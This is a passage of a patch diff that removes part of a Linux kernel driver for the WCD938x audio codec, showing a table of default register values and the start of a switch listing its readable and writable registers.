+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A7_0,                     0xE3},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_C_0,                      0x69},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_C_1,                      0x54},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_C_2,                      0x02},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_C_3,                      0x15},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R1,                       0xA4},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R2,                       0xB5},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R3,                       0x86},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R4,                       0x85},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R5,                       0xAA},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R6,                       0xE2},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R7,                       0x62},
+-	{WCD938X_DIGITAL_CDC_HPH_GAIN_RX_0,                    0x55},
+-	{WCD938X_DIGITAL_CDC_HPH_GAIN_RX_1,                    0xA9},
+-	{WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_0,                   0x3D},
+-	{WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_1,                   0x2E},
+-	{WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_2,                   0x01},
+-	{WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_0,                   0x00},
+-	{WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_1,                   0xFC},
+-	{WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_2,                   0x01},
+-	{WCD938X_DIGITAL_CDC_HPH_GAIN_CTL,                     0x00},
+-	{WCD938X_DIGITAL_CDC_AUX_GAIN_CTL,                     0x00},
+-	{WCD938X_DIGITAL_CDC_EAR_PATH_CTL,                     0x00},
+-	{WCD938X_DIGITAL_CDC_SWR_CLH,                          0x00},
+-	{WCD938X_DIGITAL_SWR_CLH_BYP,                          0x00},
+-	{WCD938X_DIGITAL_CDC_TX0_CTL,                          0x68},
+-	{WCD938X_DIGITAL_CDC_TX1_CTL,                          0x68},
+-	{WCD938X_DIGITAL_CDC_TX2_CTL,                          0x68},
+-	{WCD938X_DIGITAL_CDC_TX_RST,                           0x00},
+-	{WCD938X_DIGITAL_CDC_REQ_CTL,                          0x01},
+-	{WCD938X_DIGITAL_CDC_RST,                              0x00},
+-	{WCD938X_DIGITAL_CDC_AMIC_CTL,                         0x0F},
+-	{WCD938X_DIGITAL_CDC_DMIC_CTL,                         0x04},
+-	{WCD938X_DIGITAL_CDC_DMIC1_CTL,                        0x01},
+-	{WCD938X_DIGITAL_CDC_DMIC2_CTL,                        0x01},
+-	{WCD938X_DIGITAL_CDC_DMIC3_CTL,                        0x01},
+-	{WCD938X_DIGITAL_CDC_DMIC4_CTL,                        0x01},
+-	{WCD938X_DIGITAL_EFUSE_PRG_CTL,                        0x00},
+-	{WCD938X_DIGITAL_EFUSE_CTL,                            0x2B},
+-	{WCD938X_DIGITAL_CDC_DMIC_RATE_1_2,                    0x11},
+-	{WCD938X_DIGITAL_CDC_DMIC_RATE_3_4,                    0x11},
+-	{WCD938X_DIGITAL_PDM_WD_CTL0,                          0x00},
+-	{WCD938X_DIGITAL_PDM_WD_CTL1,                          0x00},
+-	{WCD938X_DIGITAL_PDM_WD_CTL2,                          0x00},
+-	{WCD938X_DIGITAL_INTR_MODE,                            0x00},
+-	{WCD938X_DIGITAL_INTR_MASK_0,                          0xFF},
+-	{WCD938X_DIGITAL_INTR_MASK_1,                          0xFF},
+-	{WCD938X_DIGITAL_INTR_MASK_2,                          0x3F},
+-	{WCD938X_DIGITAL_INTR_STATUS_0,                        0x00},
+-	{WCD938X_DIGITAL_INTR_STATUS_1,                        0x00},
+-	{WCD938X_DIGITAL_INTR_STATUS_2,                        0x00},
+-	{WCD938X_DIGITAL_INTR_CLEAR_0,                         0x00},
+-	{WCD938X_DIGITAL_INTR_CLEAR_1,                         0x00},
+-	{WCD938X_DIGITAL_INTR_CLEAR_2,                         0x00},
+-	{WCD938X_DIGITAL_INTR_LEVEL_0,                         0x00},
+-	{WCD938X_DIGITAL_INTR_LEVEL_1,                         0x00},
+-	{WCD938X_DIGITAL_INTR_LEVEL_2,                         0x00},
+-	{WCD938X_DIGITAL_INTR_SET_0,                           0x00},
+-	{WCD938X_DIGITAL_INTR_SET_1,                           0x00},
+-	{WCD938X_DIGITAL_INTR_SET_2,                           0x00},
+-	{WCD938X_DIGITAL_INTR_TEST_0,                          0x00},
+-	{WCD938X_DIGITAL_INTR_TEST_1,                          0x00},
+-	{WCD938X_DIGITAL_INTR_TEST_2,                          0x00},
+-	{WCD938X_DIGITAL_TX_MODE_DBG_EN,                       0x00},
+-	{WCD938X_DIGITAL_TX_MODE_DBG_0_1,                      0x00},
+-	{WCD938X_DIGITAL_TX_MODE_DBG_2_3,                      0x00},
+-	{WCD938X_DIGITAL_LB_IN_SEL_CTL,                        0x00},
+-	{WCD938X_DIGITAL_LOOP_BACK_MODE,                       0x00},
+-	{WCD938X_DIGITAL_SWR_DAC_TEST,                         0x00},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_RX_0,                     0x40},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_TX_0,                     0x40},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_RX_1,                     0x00},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_TX_1,                     0x00},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_TX_2,                     0x00},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_0,                        0x00},
+-	{WCD938X_DIGITAL_SWR_HM_TEST_1,                        0x00},
+-	{WCD938X_DIGITAL_PAD_CTL_SWR_0,                        0x8F},
+-	{WCD938X_DIGITAL_PAD_CTL_SWR_1,                        0x06},
+-	{WCD938X_DIGITAL_I2C_CTL,                              0x00},
+-	{WCD938X_DIGITAL_CDC_TX_TANGGU_SW_MODE,                0x00},
+-	{WCD938X_DIGITAL_EFUSE_TEST_CTL_0,                     0x00},
+-	{WCD938X_DIGITAL_EFUSE_TEST_CTL_1,                     0x00},
+-	{WCD938X_DIGITAL_EFUSE_T_DATA_0,                       0x00},
+-	{WCD938X_DIGITAL_EFUSE_T_DATA_1,                       0x00},
+-	{WCD938X_DIGITAL_PAD_CTL_PDM_RX0,                      0xF1},
+-	{WCD938X_DIGITAL_PAD_CTL_PDM_RX1,                      0xF1},
+-	{WCD938X_DIGITAL_PAD_CTL_PDM_TX0,                      0xF1},
+-	{WCD938X_DIGITAL_PAD_CTL_PDM_TX1,                      0xF1},
+-	{WCD938X_DIGITAL_PAD_CTL_PDM_TX2,                      0xF1},
+-	{WCD938X_DIGITAL_PAD_INP_DIS_0,                        0x00},
+-	{WCD938X_DIGITAL_PAD_INP_DIS_1,                        0x00},
+-	{WCD938X_DIGITAL_DRIVE_STRENGTH_0,                     0x00},
+-	{WCD938X_DIGITAL_DRIVE_STRENGTH_1,                     0x00},
+-	{WCD938X_DIGITAL_DRIVE_STRENGTH_2,                     0x00},
+-	{WCD938X_DIGITAL_RX_DATA_EDGE_CTL,                     0x1F},
+-	{WCD938X_DIGITAL_TX_DATA_EDGE_CTL,                     0x80},
+-	{WCD938X_DIGITAL_GPIO_MODE,                            0x00},
+-	{WCD938X_DIGITAL_PIN_CTL_OE,                           0x00},
+-	{WCD938X_DIGITAL_PIN_CTL_DATA_0,                       0x00},
+-	{WCD938X_DIGITAL_PIN_CTL_DATA_1,                       0x00},
+-	{WCD938X_DIGITAL_PIN_STATUS_0,                         0x00},
+-	{WCD938X_DIGITAL_PIN_STATUS_1,                         0x00},
+-	{WCD938X_DIGITAL_DIG_DEBUG_CTL,                        0x00},
+-	{WCD938X_DIGITAL_DIG_DEBUG_EN,                         0x00},
+-	{WCD938X_DIGITAL_ANA_CSR_DBG_ADD,                      0x00},
+-	{WCD938X_DIGITAL_ANA_CSR_DBG_CTL,                      0x48},
+-	{WCD938X_DIGITAL_SSP_DBG,                              0x00},
+-	{WCD938X_DIGITAL_MODE_STATUS_0,                        0x00},
+-	{WCD938X_DIGITAL_MODE_STATUS_1,                        0x00},
+-	{WCD938X_DIGITAL_SPARE_0,                              0x00},
+-	{WCD938X_DIGITAL_SPARE_1,                              0x00},
+-	{WCD938X_DIGITAL_SPARE_2,                              0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_0,                          0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_1,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_2,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_3,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_4,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_5,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_6,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_7,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_8,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_9,                          0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_10,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_11,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_12,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_13,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_14,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_15,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_16,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_17,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_18,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_19,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_20,                         0x0E},
+-	{WCD938X_DIGITAL_EFUSE_REG_21,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_22,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_23,                         0xF8},
+-	{WCD938X_DIGITAL_EFUSE_REG_24,                         0x16},
+-	{WCD938X_DIGITAL_EFUSE_REG_25,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_26,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_27,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_28,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_29,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_30,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_31,                         0x00},
+-	{WCD938X_DIGITAL_TX_REQ_FB_CTL_0,                      0x88},
+-	{WCD938X_DIGITAL_TX_REQ_FB_CTL_1,                      0x88},
+-	{WCD938X_DIGITAL_TX_REQ_FB_CTL_2,                      0x88},
+-	{WCD938X_DIGITAL_TX_REQ_FB_CTL_3,                      0x88},
+-	{WCD938X_DIGITAL_TX_REQ_FB_CTL_4,                      0x88},
+-	{WCD938X_DIGITAL_DEM_BYPASS_DATA0,                     0x55},
+-	{WCD938X_DIGITAL_DEM_BYPASS_DATA1,                     0x55},
+-	{WCD938X_DIGITAL_DEM_BYPASS_DATA2,                     0x55},
+-	{WCD938X_DIGITAL_DEM_BYPASS_DATA3,                     0x01},
+-};
+-
+-static bool wcd938x_rdwr_register(struct device *dev, unsigned int reg)
+-{
+-	switch (reg) {
+-	case WCD938X_ANA_PAGE_REGISTER:
+-	case WCD938X_ANA_BIAS:
+-	case WCD938X_ANA_RX_SUPPLIES:
+-	case WCD938X_ANA_HPH:
+-	case WCD938X_ANA_EAR:
+-	case WCD938X_ANA_EAR_COMPANDER_CTL:
+-	case WCD938X_ANA_TX_CH1:
+-	case WCD938X_ANA_TX_CH2:
+-	case WCD938X_ANA_TX_CH3:
+-	case WCD938X_ANA_TX_CH4:
+-	case WCD938X_ANA_MICB1_MICB2_DSP_EN_LOGIC:
+-	case WCD938X_ANA_MICB3_DSP_EN_LOGIC:
+-	case WCD938X_ANA_MBHC_MECH:
+-	case WCD938X_ANA_MBHC_ELECT:
+-	case WCD938X_ANA_MBHC_ZDET:
+-	case WCD938X_ANA_MBHC_BTN0:
+-	case WCD938X_ANA_MBHC_BTN1:
+-	case WCD938X_ANA_MBHC_BTN2:
+-	case WCD938X_ANA_MBHC_BTN3:
+-	case WCD938X_ANA_MBHC_BTN4:
+-	case WCD938X_ANA_MBHC_BTN5:
+-	case WCD938X_ANA_MBHC_BTN6:
+-	case WCD938X_ANA_MBHC_BTN7:
+-	case WCD938X_ANA_MICB1:
+-	case WCD938X_ANA_MICB2:
+-	case WCD938X_ANA_MICB2_RAMP:
+-	case WCD938X_ANA_MICB3:
+-	case WCD938X_ANA_MICB4:
+-	case WCD938X_BIAS_CTL:
+-	case WCD938X_BIAS_VBG_FINE_ADJ:
+-	case WCD938X_LDOL_VDDCX_ADJUST:
+-	case WCD938X_LDOL_DISABLE_LDOL:
+-	case WCD938X_MBHC_CTL_CLK:
+-	case WCD938X_MBHC_CTL_ANA:
+-	case WCD938X_MBHC_CTL_SPARE_1:
+-	case WCD938X_MBHC_CTL_SPARE_2:
+-	case WCD938X_MBHC_CTL_BCS:
+-	case WCD938X_MBHC_TEST_CTL:
+-	case WCD938X_LDOH_MODE:
+-	case WCD938X_LDOH_BIAS:
+-	case WCD938X_LDOH_STB_LOADS:
+-	case WCD938X_LDOH_SLOWRAMP:
+-	case WCD938X_MICB1_TEST_CTL_1:
+-	case WCD938X_MICB1_TEST_CTL_2:
+-	case WCD938X_MICB1_TEST_CTL_3:
+-	case WCD938X_MICB2_TEST_CTL_1:
+-	case WCD938X_MICB2_TEST_CTL_2:
+-	case WCD938X_MICB2_TEST_CTL_3:
+-	case WCD938X_MICB3_TEST_CTL_1:
+-	case WCD938X_MICB3_TEST_CTL_2:
+-	case WCD938X_MICB3_TEST_CTL_3:
+-	case WCD938X_MICB4_TEST_CTL_1:
+-	case WCD938X_MICB4_TEST_CTL_2:
+-	case WCD938X_MICB4_TEST_CTL_3:
+-	case WCD938X_TX_COM_ADC_VCM:
+-	case WCD938X_TX_COM_BIAS_ATEST:
+-	case WCD938X_TX_COM_SPARE1:
+-	case WCD938X_TX_COM_SPARE2:
+-	case WCD938X_TX_COM_TXFE_DIV_CTL:
+-	case WCD938X_TX_COM_TXFE_DIV_START:
+-	case WCD938X_TX_COM_SPARE3:
+-	case WCD938X_TX_COM_SPARE4:
+-	case WCD938X_TX_1_2_TEST_EN:
+-	case WCD938X_TX_1_2_ADC_IB:
+-	case WCD938X_TX_1_2_ATEST_REFCTL:
+-	case WCD938X_TX_1_2_TEST_CTL:
+-	case WCD938X_TX_1_2_TEST_BLK_EN1:
+-	case WCD938X_TX_1_2_TXFE1_CLKDIV:
+-	case WCD938X_TX_3_4_TEST_EN:
+-	case WCD938X_TX_3_4_ADC_IB:
+-	case WCD938X_TX_3_4_ATEST_REFCTL:
+-	case WCD938X_TX_3_4_TEST_CTL:
+-	case WCD938X_TX_3_4_TEST_BLK_EN3:
+-	case WCD938X_TX_3_4_TXFE3_CLKDIV:
+-	case WCD938X_TX_3_4_TEST_BLK_EN2:
+-	case WCD938X_TX_3_4_TXFE2_CLKDIV:
+-	case WCD938X_TX_3_4_SPARE1:
+-	case WCD938X_TX_3_4_TEST_BLK_EN4:
+-	case WCD938X_TX_3_4_TXFE4_CLKDIV:
+-	case WCD938X_TX_3_4_SPARE2:
+-	case WCD938X_CLASSH_MODE_1:
+-	case WCD938X_CLASSH_MODE_2:
+-	case WCD938X_CLASSH_MODE_3:
+-	case WCD938X_CLASSH_CTRL_VCL_1:
+-	case WCD938X_CLASSH_CTRL_VCL_2:
+-	case WCD938X_CLASSH_CTRL_CCL_1:
+-	case WCD938X_CLASSH_CTRL_CCL_2:
+-	case WCD938X_CLASSH_CTRL_CCL_3:
+-	case WCD938X_CLASSH_CTRL_CCL_4:
+-	case WCD938X_CLASSH_CTRL_CCL_5:
+-	case WCD938X_CLASSH_BUCK_TMUX_A_D:
+-	case WCD938X_CLASSH_BUCK_SW_DRV_CNTL:
+-	case WCD938X_CLASSH_SPARE:
+-	case WCD938X_FLYBACK_EN:
+-	case WCD938X_FLYBACK_VNEG_CTRL_1:
+-	case WCD938X_FLYBACK_VNEG_CTRL_2:
+-	case WCD938X_FLYBACK_VNEG_CTRL_3:
+-	case WCD938X_FLYBACK_VNEG_CTRL_4:
+-	case WCD938X_FLYBACK_VNEG_CTRL_5:
+-	case WCD938X_FLYBACK_VNEG_CTRL_6:
+-	case WCD938X_FLYBACK_VNEG_CTRL_7:
+-	case WCD938X_FLYBACK_VNEG_CTRL_8:
+-	case WCD938X_FLYBACK_VNEG_CTRL_9:
+-	case WCD938X_FLYBACK_VNEGDAC_CTRL_1:
+-	case WCD938X_FLYBACK_VNEGDAC_CTRL_2:
+-	case WCD938X_FLYBACK_VNEGDAC_CTRL_3:
+-	case WCD938X_FLYBACK_CTRL_1:
+-	case WCD938X_FLYBACK_TEST_CTL:
+-	case WCD938X_RX_AUX_SW_CTL:
+-	case WCD938X_RX_PA_AUX_IN_CONN:
+-	case WCD938X_RX_TIMER_DIV:
+-	case WCD938X_RX_OCP_CTL:
+-	case WCD938X_RX_OCP_COUNT:
+-	case WCD938X_RX_BIAS_EAR_DAC:
+-	case WCD938X_RX_BIAS_EAR_AMP:
+-	case WCD938X_RX_BIAS_HPH_LDO:
+-	case WCD938X_RX_BIAS_HPH_PA:
+-	case WCD938X_RX_BIAS_HPH_RDACBUFF_CNP2:
+-	case WCD938X_RX_BIAS_HPH_RDAC_LDO:
+-	case WCD938X_RX_BIAS_HPH_CNP1:
+-	case WCD938X_RX_BIAS_HPH_LOWPOWER:
+-	case WCD938X_RX_BIAS_AUX_DAC:
+-	case WCD938X_RX_BIAS_AUX_AMP:
+-	case WCD938X_RX_BIAS_VNEGDAC_BLEEDER:
+-	case WCD938X_RX_BIAS_MISC:
+-	case WCD938X_RX_BIAS_BUCK_RST:
+-	case WCD938X_RX_BIAS_BUCK_VREF_ERRAMP:
+-	case WCD938X_RX_BIAS_FLYB_ERRAMP:
+-	case WCD938X_RX_BIAS_FLYB_BUFF:
+-	case WCD938X_RX_BIAS_FLYB_MID_RST:
+-	case WCD938X_HPH_CNP_EN:
+-	case WCD938X_HPH_CNP_WG_CTL:
+-	case WCD938X_HPH_CNP_WG_TIME:
+-	case WCD938X_HPH_OCP_CTL:
+-	case WCD938X_HPH_AUTO_CHOP:
+-	case WCD938X_HPH_CHOP_CTL:
+-	case WCD938X_HPH_PA_CTL1:
+-	case WCD938X_HPH_PA_CTL2:
+-	case WCD938X_HPH_L_EN:
+-	case WCD938X_HPH_L_TEST:
+-	case WCD938X_HPH_L_ATEST:
+-	case WCD938X_HPH_R_EN:
+-	case WCD938X_HPH_R_TEST:
+-	case WCD938X_HPH_R_ATEST:
+-	case WCD938X_HPH_RDAC_CLK_CTL1:
+-	case WCD938X_HPH_RDAC_CLK_CTL2:
+-	case WCD938X_HPH_RDAC_LDO_CTL:
+-	case WCD938X_HPH_RDAC_CHOP_CLK_LP_CTL:
+-	case WCD938X_HPH_REFBUFF_UHQA_CTL:
+-	case WCD938X_HPH_REFBUFF_LP_CTL:
+-	case WCD938X_HPH_L_DAC_CTL:
+-	case WCD938X_HPH_R_DAC_CTL:
+-	case WCD938X_HPH_SURGE_HPHLR_SURGE_COMP_SEL:
+-	case WCD938X_HPH_SURGE_HPHLR_SURGE_EN:
+-	case WCD938X_HPH_SURGE_HPHLR_SURGE_MISC1:
+-	case WCD938X_EAR_EAR_EN_REG:
+-	case WCD938X_EAR_EAR_PA_CON:
+-	case WCD938X_EAR_EAR_SP_CON:
+-	case WCD938X_EAR_EAR_DAC_CON:
+-	case WCD938X_EAR_EAR_CNP_FSM_CON:
+-	case WCD938X_EAR_TEST_CTL:
+-	case WCD938X_ANA_NEW_PAGE_REGISTER:
+-	case WCD938X_HPH_NEW_ANA_HPH2:
+-	case WCD938X_HPH_NEW_ANA_HPH3:
+-	case WCD938X_SLEEP_CTL:
+-	case WCD938X_SLEEP_WATCHDOG_CTL:
+-	case WCD938X_MBHC_NEW_ELECT_REM_CLAMP_CTL:
+-	case WCD938X_MBHC_NEW_CTL_1:
+-	case WCD938X_MBHC_NEW_CTL_2:
+-	case WCD938X_MBHC_NEW_PLUG_DETECT_CTL:
+-	case WCD938X_MBHC_NEW_ZDET_ANA_CTL:
+-	case WCD938X_MBHC_NEW_ZDET_RAMP_CTL:
+-	case WCD938X_TX_NEW_AMIC_MUX_CFG:
+-	case WCD938X_AUX_AUXPA:
+-	case WCD938X_LDORXTX_MODE:
+-	case WCD938X_LDORXTX_CONFIG:
+-	case WCD938X_DIE_CRACK_DIE_CRK_DET_EN:
+-	case WCD938X_HPH_NEW_INT_RDAC_GAIN_CTL:
+-	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L:
+-	case WCD938X_HPH_NEW_INT_RDAC_VREF_CTL:
+-	case WCD938X_HPH_NEW_INT_RDAC_OVERRIDE_CTL:
+-	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R:
+-	case WCD938X_HPH_NEW_INT_PA_MISC1:
+-	case WCD938X_HPH_NEW_INT_PA_MISC2:
+-	case WCD938X_HPH_NEW_INT_PA_RDAC_MISC:
+-	case WCD938X_HPH_NEW_INT_HPH_TIMER1:
+-	case WCD938X_HPH_NEW_INT_HPH_TIMER2:
+-	case WCD938X_HPH_NEW_INT_HPH_TIMER3:
+-	case WCD938X_HPH_NEW_INT_HPH_TIMER4:
+-	case WCD938X_HPH_NEW_INT_PA_RDAC_MISC2:
+-	case WCD938X_HPH_NEW_INT_PA_RDAC_MISC3:
+-	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L_NEW:
+-	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R_NEW:
+-	case WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_LOHIFI:
+-	case WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_ULP:
+-	case WCD938X_RX_NEW_INT_HPH_RDAC_LDO_LP:
+-	case WCD938X_MBHC_NEW_INT_MOISTURE_DET_DC_CTRL:
+-	case WCD938X_MBHC_NEW_INT_MOISTURE_DET_POLLING_CTRL:
+-	case WCD938X_MBHC_NEW_INT_MECH_DET_CURRENT:
+-	case WCD938X_MBHC_NEW_INT_SPARE_2:
+-	case WCD938X_EAR_INT_NEW_EAR_CHOPPER_CON:
+-	case WCD938X_EAR_INT_NEW_CNP_VCM_CON1:
+-	case WCD938X_EAR_INT_NEW_CNP_VCM_CON2:
+-	case WCD938X_EAR_INT_NEW_EAR_DYNAMIC_BIAS:
+-	case WCD938X_AUX_INT_EN_REG:
+-	case WCD938X_AUX_INT_PA_CTRL:
+-	case WCD938X_AUX_INT_SP_CTRL:
+-	case WCD938X_AUX_INT_DAC_CTRL:
+-	case WCD938X_AUX_INT_CLK_CTRL:
+-	case WCD938X_AUX_INT_TEST_CTRL:
+-	case WCD938X_AUX_INT_MISC:
+-	case WCD938X_LDORXTX_INT_BIAS:
+-	case WCD938X_LDORXTX_INT_STB_LOADS_DTEST:
+-	case WCD938X_LDORXTX_INT_TEST0:
+-	case WCD938X_LDORXTX_INT_STARTUP_TIMER:
+-	case WCD938X_LDORXTX_INT_TEST1:
+-	case WCD938X_SLEEP_INT_WATCHDOG_CTL_1:
+-	case WCD938X_SLEEP_INT_WATCHDOG_CTL_2:
+-	case WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT1:
+-	case WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT2:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L2:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L1:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L0:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP1P2M:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP0P6M:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L2L1:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L0:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_ULP:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L2L1:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L0:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_ULP:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_L2L1L0:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_ULP:
+-	case WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L2L1:
+-	case WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L0ULP:
+-	case WCD938X_TX_COM_NEW_INT_TXADC_INT_L2:
+-	case WCD938X_TX_COM_NEW_INT_TXADC_INT_L1:
+-	case WCD938X_TX_COM_NEW_INT_TXADC_INT_L0:
+-	case WCD938X_TX_COM_NEW_INT_TXADC_INT_ULP:
+-	case WCD938X_DIGITAL_PAGE_REGISTER:
+-	case WCD938X_DIGITAL_SWR_TX_CLK_RATE:
+-	case WCD938X_DIGITAL_CDC_RST_CTL:
+-	case WCD938X_DIGITAL_TOP_CLK_CFG:
+-	case WCD938X_DIGITAL_CDC_ANA_CLK_CTL:
+-	case WCD938X_DIGITAL_CDC_DIG_CLK_CTL:
+-	case WCD938X_DIGITAL_SWR_RST_EN:
+-	case WCD938X_DIGITAL_CDC_PATH_MODE:
+-	case WCD938X_DIGITAL_CDC_RX_RST:
+-	case WCD938X_DIGITAL_CDC_RX0_CTL:
+-	case WCD938X_DIGITAL_CDC_RX1_CTL:
+-	case WCD938X_DIGITAL_CDC_RX2_CTL:
+-	case WCD938X_DIGITAL_CDC_TX_ANA_MODE_0_1:
+-	case WCD938X_DIGITAL_CDC_TX_ANA_MODE_2_3:
+-	case WCD938X_DIGITAL_CDC_COMP_CTL_0:
+-	case WCD938X_DIGITAL_CDC_ANA_TX_CLK_CTL:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A1_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A1_1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A2_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A2_1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A3_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A3_1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A4_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A4_1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A5_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A5_1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A6_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A7_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_C_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_C_1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_C_2:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_C_3:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R2:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R3:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R4:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R5:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R6:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R7:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A1_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A1_1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A2_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A2_1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A3_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A3_1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A4_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A4_1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A5_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A5_1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A6_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A7_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_C_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_C_1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_C_2:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_C_3:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R2:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R3:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R4:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R5:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R6:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R7:
+-	case WCD938X_DIGITAL_CDC_HPH_GAIN_RX_0:
+-	case WCD938X_DIGITAL_CDC_HPH_GAIN_RX_1:
+-	case WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_0:
+-	case WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_1:
